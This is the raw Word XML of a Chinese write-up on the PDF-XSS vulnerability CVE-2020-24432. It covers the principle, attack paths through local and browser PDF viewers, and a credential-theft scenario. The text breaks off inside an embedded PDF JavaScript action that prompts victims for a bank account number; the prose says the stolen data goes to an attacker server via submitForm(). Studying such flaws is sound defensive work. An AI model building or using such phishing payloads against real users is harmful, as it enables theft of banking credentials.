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213BE" w14:textId="77777777" w:rsidR="00D87DFA" w:rsidRDefault="00D87DFA" w:rsidP="009F55E8">
      <w:pPr>
        <w:ind w:firstLineChars="1100" w:firstLine="2420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D87DFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CVE-2020-24432</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> pdf-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞专题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7127A6" w14:textId="3BB530A3" w:rsidR="00870DD3" w:rsidRDefault="002562A4" w:rsidP="00870DD3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一、</w:t>
      </w:r>
      <w:r w:rsidR="00870DD3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00A3609B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原理</w:t>
      </w:r>
      <w:r w:rsidR="00870DD3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0300899E" w14:textId="50F9063D" w:rsidR="00870DD3" w:rsidRDefault="00870DD3" w:rsidP="00870DD3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="440"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PDF-XSS 是一种安全漏洞，攻击者通过将恶意的脚本代码（通常是JavaScript）植入到PDF文件中，当用户使用易受攻击的PDF阅读器（</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如旧版</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的Adobe Reader、某些浏览器内置的PDF插件等）打开此文件时，嵌入的脚本代码会被执行，从而发起</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨站脚本</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3D430E" w14:textId="56A5C37F" w:rsidR="00870DD3" w:rsidRDefault="00870DD3" w:rsidP="009F46B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它的本质是 将PDF文件作为一种XSS攻击的传递载体。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D9650B" w14:textId="37D26161" w:rsidR="0001098A" w:rsidRDefault="00B25BFF" w:rsidP="009F46B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二</w:t>
      </w:r>
      <w:r w:rsidR="002562A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00D20A53" w:rsidRPr="00D20A53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PDF XSS 漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00D20A53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F51EC4" w14:textId="348B293A" w:rsidR="006067B3" w:rsidRDefault="006067B3" w:rsidP="009F46B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00455314">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分</w:t>
      </w:r>
      <w:r w:rsidR="00DC16F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>浏览pdf文件的地方</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000451C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如谷歌浏览器</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00DC16F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，存在保护机制</w:t>
      </w:r>
      <w:r w:rsidR="005C1DDD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，导致</w:t>
      </w:r>
      <w:r w:rsidR="00455314">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00BC4F9A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DF</w:t>
      </w:r>
      <w:r w:rsidR="00455314">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00BC4F9A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="005C1DDD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法触发成功，</w:t>
      </w:r>
      <w:r w:rsidR="000451C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要研究其他攻击路径，比如</w:t>
      </w:r>
      <w:r w:rsidR="009F49E7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidR="009F49E7" w:rsidRPr="009F49E7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地 PDF 阅读器触发</w:t>
      </w:r>
      <w:r w:rsidR="00342C79">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778BD985" w14:textId="38C63265" w:rsidR="00493B0D" w:rsidRDefault="00095EE8" w:rsidP="00493B0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00493B0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、通过本地 PDF 阅读器触发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B24C6D1" w14:textId="77777777" w:rsidR="00493B0D" w:rsidRDefault="00493B0D" w:rsidP="00493B0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意文件制作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6763545B" w14:textId="7D4D31AD" w:rsidR="00493B0D" w:rsidRDefault="00493B0D" w:rsidP="00493B0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者构造一个内嵌恶意 JavaScript 代码的 PDF 文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A82802" w14:textId="77777777" w:rsidR="00493B0D" w:rsidRDefault="00493B0D" w:rsidP="00493B0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件传播</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F94FA64" w14:textId="0A8BF26B" w:rsidR="00493B0D" w:rsidRDefault="00493B0D" w:rsidP="00493B0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者通过邮件、即时通讯工具或文件共享网站等途径分发该恶意 PDF。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615679EF" w14:textId="77777777" w:rsidR="00493B0D" w:rsidRDefault="00493B0D" w:rsidP="00493B0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户打开文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44661F19" w14:textId="34C1CB13" w:rsidR="00493B0D" w:rsidRDefault="00493B0D" w:rsidP="00493B0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目标用户下载并在本地 PDF 阅读器（如 Adobe Acrobat、Foxit Reader 等）中打开该文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC3CF56" w14:textId="77777777" w:rsidR="00493B0D" w:rsidRDefault="00493B0D" w:rsidP="00493B0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本解析与执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF5D423" w14:textId="77777777" w:rsidR="00493B0D" w:rsidRDefault="00493B0D" w:rsidP="00493B0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PDF 阅读器在解析文件过程中，自动执行其中嵌入的 JavaScript 代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D7F78A" w14:textId="77777777" w:rsidR="00493B0D" w:rsidRDefault="00493B0D" w:rsidP="00493B0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13404526" w14:textId="77777777" w:rsidR="00493B0D" w:rsidRDefault="00493B0D" w:rsidP="00493B0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意行为生效</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A97861" w14:textId="77777777" w:rsidR="00493B0D" w:rsidRDefault="00493B0D" w:rsidP="00493B0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本执行可能导致用户敏感信息泄露、会话劫持或本地文件被篡改。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377BF635" w14:textId="77777777" w:rsidR="00493B0D" w:rsidRDefault="00493B0D" w:rsidP="00493B0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29A12858" w14:textId="4DD6BCA0" w:rsidR="00493B0D" w:rsidRDefault="00095EE8" w:rsidP="00493B0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00493B0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">、通过浏览器内置 PDF </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00493B0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看器</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00493B0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>触发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269590B0" w14:textId="77777777" w:rsidR="00493B0D" w:rsidRDefault="00493B0D" w:rsidP="00493B0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用浏览器解析特性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DC65CF" w14:textId="77777777" w:rsidR="00493B0D" w:rsidRDefault="00493B0D" w:rsidP="00493B0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">现代浏览器（如 Chrome、Firefox）内置的 PDF </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看器支持</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在渲染 PDF 时执行其中嵌入的 JavaScript。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3AA70A" w14:textId="77777777" w:rsidR="00493B0D" w:rsidRDefault="00493B0D" w:rsidP="00493B0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2127199B" w14:textId="77777777" w:rsidR="00493B0D" w:rsidRDefault="00493B0D" w:rsidP="00493B0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740E033B" w14:textId="77777777" w:rsidR="00493B0D" w:rsidRDefault="00493B0D" w:rsidP="00493B0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户直接通过浏览器访问托管在网站上的恶意 PDF 文件，无需下载到本地。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589EE9EA" w14:textId="77777777" w:rsidR="00493B0D" w:rsidRDefault="00493B0D" w:rsidP="00493B0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63809D08" w14:textId="77777777" w:rsidR="00493B0D" w:rsidRDefault="00493B0D" w:rsidP="00493B0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自动执行脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787068CA" w14:textId="12D643F2" w:rsidR="00493B0D" w:rsidRDefault="00493B0D" w:rsidP="00493B0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>浏览器在渲染过程中解析并执行 PDF 内嵌的 JavaScript，从而实现 XSS 攻击</w:t>
      </w:r>
      <w:r w:rsidR="002A5729" w:rsidRPr="009F46B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F62260" w14:textId="77777777" w:rsidR="00D60E5E" w:rsidRDefault="00D60E5E" w:rsidP="00493B0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E1696FD" w14:textId="69274A2D" w:rsidR="002562A4" w:rsidRDefault="002562A4" w:rsidP="00493B0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三、</w:t>
      </w:r>
      <w:r w:rsidR="00335386">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DADD15" w14:textId="77777777" w:rsidR="008A48E6" w:rsidRPr="000D5DD3" w:rsidRDefault="008A48E6" w:rsidP="008A48E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D5DD3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>窃取凭证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB1CACB" w14:textId="11E59AB7" w:rsidR="008A48E6" w:rsidRDefault="008A48E6" w:rsidP="008A48E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大多数银行都会</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送受</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户账户和密码保护的月度账单。如果客户成为网络钓鱼攻击的受害者，其凭证可能会被窃取。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB9C65E" w14:textId="21C1A8EC" w:rsidR="008A48E6" w:rsidRPr="007400DD" w:rsidRDefault="008A48E6" w:rsidP="008A48E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下场景演示了攻击者如何窃取凭据并使用提交表单方法将其发送到自己的服务器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A26E87" w14:textId="74813196" w:rsidR="008A48E6" w:rsidRDefault="008A48E6" w:rsidP="008A48E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>app.response</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()` 的第一个参数是响应框中显示的文本。这是标准输入，但由于响应</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>框始终</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示一个文本输入框，因此可以不带任何参数调用。如果用户按下“确定”按钮退出对话框，则在此框中输入的文本将返回给 `account` 变量。如果用户按下“取消”按钮，则 `account` 将为空，第二个参数的情况也相同。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3099DA75" w14:textId="673C8EE7" w:rsidR="008A48E6" w:rsidRPr="007400DD" w:rsidRDefault="008A48E6" w:rsidP="008A48E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cURL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 变量中，添加了攻击者服务器以及从受害者处收集的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>帐户</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和密码，并使用 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>submitForm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>() 函数将其提交给攻击者。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ae"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8296"/>
      </w:tblGrid>
      <w:tr w:rsidR="00762837" w14:paraId="6396BB1E" w14:textId="77777777" w:rsidTr="00762837">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63938969" w14:textId="77777777" w:rsidR="00762837" w:rsidRDefault="00762837" w:rsidP="00762837">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;&lt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E0B6D91" w14:textId="77777777" w:rsidR="00762837" w:rsidRDefault="00762837" w:rsidP="00762837">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/Type /Action</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07772726" w14:textId="77777777" w:rsidR="00762837" w:rsidRDefault="00762837" w:rsidP="00762837">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/S /JavaScript</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01259D9F" w14:textId="77777777" w:rsidR="00762837" w:rsidRDefault="00762837" w:rsidP="00762837">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/JS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B1C94D0" w14:textId="77777777" w:rsidR="00762837" w:rsidRDefault="00762837" w:rsidP="00762837">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32859DF2" w14:textId="77777777" w:rsidR="00762837" w:rsidRDefault="00762837" w:rsidP="00762837">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">var account = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>app.response</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">({ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>cQuestion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">:"Enter your Bank Account Number", </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>cTitle</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">:"Bank Account Details", </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>bPassword:false</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>cDefault</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>global.cLastPswd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>cLabel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">:"A/C"}); </w:t>
            </w:r>
